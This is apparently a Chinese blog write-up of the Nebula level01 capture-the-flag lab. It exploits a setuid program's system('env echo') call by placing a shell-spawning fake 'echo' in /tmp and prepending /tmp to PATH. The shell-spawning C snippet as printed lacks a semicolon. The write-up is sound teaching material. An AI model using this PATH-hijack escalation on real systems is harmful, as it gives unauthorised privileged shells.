Nebula level01
来源:互联网 发布:算法导论 azw3 编辑:程序博客网 时间:2024/05/22 01:35
There is a vulnerability in the below program that allows arbitrary programs to be executed, can you find it?
To do this level, log in as the level01 account with the password level01 . Files for this level can be found in /home/flag01.
#include <stdlib.h>#include <unistd.h>#include <string.h>#include <sys/types.h>#include <stdio.h>int main(int argc, char **argv, char **envp){gid_t gid;uid_t uid;gid = getegid();uid = geteuid();setresgid(gid, gid, gid);setresuid(uid, uid, uid);system("/usr/bin/env echo and now what?");}使用level01用户名来编译运行(比如可执行程序为flag01)后添加用户名为flag01的可执行位,然后用level01的用户来运行程序,如何获取flag01的用户权限呢?其中有一个getflag的可执行程序,如果获取了对应的权限,那么运行这个getflag会打印出成功获取权限的信息。
首先得明白env这个命令是干什么的,env用来执行当前环境变量下的命令或者显示当前的环境变量。
echo是打印命令。
如果直接运行这个程序肯定会在终端上打印出来 and now what?
要想获得flag01的权限关键是利用system这个执行命令的系统调用。我们这个程序的可执行权限已经是flag01了,也就是它的euid用户是已经是flag01了。
因为echo已经是系统的内置命令了,所以我们无法改变echo的行为,开始时先export echo=getflag,或者别的一些都是不成功的,依然无法改变echo的行为。
因为每个用户在/tmp下面都是具有rwx权限的,所以我们可以在/tmp下面新建一个echo,然后export PATH=/tmp:$PATH, 这样的话执行起来会先去/tmp目录下查找echo这个可执行程序,如果存在则运行。
好的,下面在/tmp目录下新建一个文件test.c:
#include <stdlib.h>#include <sys/types.h>#include <unistd.h>int main(){ setuid(0); setgid(0); execl("/bin/sh","sh",(char *)0) return 0;}然后gcc -o echo test.c
好的,来到我们flag01的目录下运行./flag01, 发现返回了一个shell,输入命令whoami, 发现用户名变成了flag01,运行getflag发现oh,my God!
成功。
- Nebula level01
- Nebula
- 黑客入门之fusion level01
- nebula 0
- Nebula level00
- Nebula level02
- Nebula level04
- Nebula level03
- Nebula level05
- Nebula level06
- Nebula level07
- Nebula level08
- Nebula level09
- Nebula level10
- Nebula level11
- Nebula level12
- Nebula level13
- Nebula level14
- Eclipse如何自动生成注释
- delphi 指针
- Cache-Control标头和OutputCache
- 构建二叉堆时间复杂度的证明
- sqlite嵌入式数据库在arm-linux下的编译全攻略
- Nebula level01
- javascript不可用的问题探究
- linux一些
- Proc文件系统
- exec函数族
- PHPUnit学习笔记(一)PHPUnit介绍及安装
- DdVisualizer 8.0.1 小技巧
- shell脚本学习
- RedHat Enterprise 5.2 下载以及序列号